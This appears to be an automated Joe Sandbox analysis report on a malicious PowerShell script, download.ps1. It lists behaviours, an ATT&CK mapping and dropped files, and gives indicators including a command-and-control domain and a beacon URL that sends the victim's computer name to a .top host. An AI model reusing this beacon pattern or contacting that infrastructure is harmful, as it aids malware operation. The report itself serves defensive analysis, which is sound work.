Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	121 Virtualization/Sandbox Evasion	OS Credential Dumping	211 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	121 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	11 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
download.ps1	3%	ReversingLabs

Source	Detection	Scanner	Label
http://$rb9w1lvtg27jsno/$uys5qoe7i4wbpnv.php?id=$env:computername&key=$siumfg&s=527	0%	Avira URL Cloud	safe
http://bkkeiekjfcdaaen.top/sb5xvzt83whtr.php?id=user-PC&key=125435732625&s=527	100%	Avira URL Cloud	malware
http://crl.microsHG	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bkkeiekjfcdaaen.top	168.100.10.140	true	false		high
www.google.com	142.250.181.68	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://bkkeiekjfcdaaen.top/sb5xvzt83whtr.php?id=user-PC&key=125435732625&s=527	false	Avira URL Cloud: malware	unknown
http://www.google.com/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://$rb9w1lvtg27jsno/$uys5qoe7i4wbpnv.php?id=$env:computername&key=$siumfg&s=527	powershell.exe, 00000000.00000002.2141262045.00000202DB838000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DCBFD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://photos.google.com/?tab=wq&pageId=none	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/preferences?hl=enX	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://csp.withgoogle.com/csp/gws/other-hp	powershell.exe, 00000000.00000002.2141262045.00000202DCEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DCF13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2170366524.00000202EB9EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://bkkeiekjfcdaaen.top	powershell.exe, 00000000.00000002.2141262045.00000202DCBFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DCE90000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000000.00000002.2170366524.00000202EB6AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://news.google.com/?tab=wn	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/?usp=docs_alc	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schema.org/WebPage	powershell.exe, 00000000.00000002.2141262045.00000202DCF13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDAA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDA81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDD9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDDC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDC12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDDBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDA9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDA95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2170366524.00000202EB9EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDA90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDDB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDAA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDDAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDA8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDDA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://0.google.com/	powershell.exe, 00000000.00000002.2141262045.00000202DCF13000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/webhp?tab=ww	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schema.org/WebPageX	powershell.exe, 00000000.00000002.2141262045.00000202DCF13000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000000.00000002.2170366524.00000202EB6AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.2170366524.00000202EB7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2170366524.00000202EB6AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/finance?tab=we	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://maps.google.com/maps?hl=en&tab=wl	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com	powershell.exe, 00000000.00000002.2141262045.00000202DCEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DCE9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DCE90000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	powershell.exe, 00000000.00000002.2141262045.00000202DCEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DCF13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DD0B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2170366524.00000202EB9EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.2141262045.00000202DB611000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.blogger.com/?tab=wj	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/mobile/?hl=en&tab=wD	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://play.google.com/?hl=en&tab=w8	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.2170366524.00000202EB7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2170366524.00000202EB6AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/imghp?hl=en&tab=wi	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/shopping?hl=en&source=og&tab=wf	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lh3.googleusercontent.com/ogw/default-user=s96	powershell.exe, 00000000.00000002.2141262045.00000202DCEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DCF13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2170366524.00000202EB9EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.2141262045.00000202DB838000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000000.00000002.2141262045.00000202DB838000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.2141262045.00000202DB838000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/?tab=wo	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000000.00000002.2170366524.00000202EB6AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsHG	powershell.exe, 00000000.00000002.2181227242.00000202F36E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://0.google	powershell.exe, 00000000.00000002.2141262045.00000202DCF13000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/?tab=wm	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.2141262045.00000202DB838000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/?tab=w1	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://0.google.	powershell.exe, 00000000.00000002.2141262045.00000202DCF13000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lh3.googleusercontent.com/ogw/default-user=s96X	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://0.google.com/	powershell.exe, 00000000.00000002.2141262045.00000202DCF13000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lh3.googleusercontent.com/ogw/default-user=s24	powershell.exe, 00000000.00000002.2170366524.00000202EB9EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/history/optout?hl=en	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://books.google.com/?hl=en&tab=wp	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://translate.google.com/?hl=en&tab=wT	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000000.00000002.2141262045.00000202DB838000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/intl/en/about/products?tab=whX	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://calendar.google.com/calendar?tab=wc	powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.2141262045.00000202DB611000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lh3.googleusercontent.com/ogw/default-user=s24X	powershell.exe, 00000000.00000002.2141262045.00000202DD0B5000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.181.68	www.google.com	United States		15169	GOOGLEUS	false
168.100.10.140	bkkeiekjfcdaaen.top	United States		3700	CLOUD9US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561509
Start date and time:	2024-11-23 16:11:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	download.ps1
Detection:	MAL
Classification:	mal72.evad.winPS1@2/7@2/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 89% Number of executed functions: 16 Number of non-executed functions: 6
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6392 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: download.ps1

Simulations

Behavior and APIs

Time	Type	Description
10:11:55	API Interceptor	45x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
168.100.10.140	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/1cwhlgzp9yhtr.php?id=computer&key=38995583269&s=527
	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/7umlt3rvkyhtr.php?id=user-PC&key=107945053478&s=527
	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/4rftq71gychtr.php?id=computer&key=65957748638&s=527
	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/724fcgvj0zhtr.php?id=computer&key=19065964721&s=527
	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/azsnwdvty3htr.php?id=computer&key=26952593426&s=527
	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/8q15codrajhtr.php?id=computer&key=64783547223&s=527
	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/qcv23gjlkshtr.php?id=computer&key=37300482849&s=527
	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/vq1gdtb0ayhtr.php?id=computer&key=11725786925&s=527
	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/lxh9gvkpzrhtr.php?id=computer&key=17122624777&s=527
	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/lab7gj2rpmhtr.php?id=computer&key=60239845129&s=527

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bkkeiekjfcdaaen.top	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUD9US	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul9ihlh:NllUAz
MD5:	830AC629DD1BABB2E1751C8179DEA540
SHA1:	6946CA8BF7F06C5B5C71EF87C5EA127CCAFF314F
SHA-256:	28B0A04C474D380F43D118BAAE1C2F19ABA78F0A9FF2ACB6B3CEA50D19C88DEB
SHA-512:	378D13B562A62B5AE492EEC2D539D1112A4C90460ADAD60EC7BA8A2130C5B846B0D4CFB3CC0E07E564A4E7A959E143D23D4FB2E23832D301C4263A4AA1E3A32A
Malicious:	false
Reputation:	low
Preview:	@...e.................................l.&............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g3pqnhy0.bcu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mow32suy.pl5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4ou5lqk.a5e.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1iesxrq.zkm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.688072079024628
Encrypted:	false
SSDEEP:	48:WJXaXXCcbU2K+PoukvhkvklCywdn2BAsslzOSogZowhAsslWOSogZok1:oXOXChoJkvhkvCCtYAssRHHAsseH7
MD5:	E7B303692AF594A9DFD528959D93BCC6
SHA1:	1ED9AB3950DFFD92D8C048458E3F5C5DEA11B070
SHA-256:	4C8B223D82855EAD6B56CEECD1FA7E08B1BC1233C406F87E3276EC2F2D143DE1
SHA-512:	CB9D04C56DFA39190C363DDB84FA2FEFCDDCB50AA14073B3ECBE7C664423DECCC75706B528ACEDA5169273B0FEF51BFB3B33B034722918B6C132B617FD8CFA58
Malicious:	false
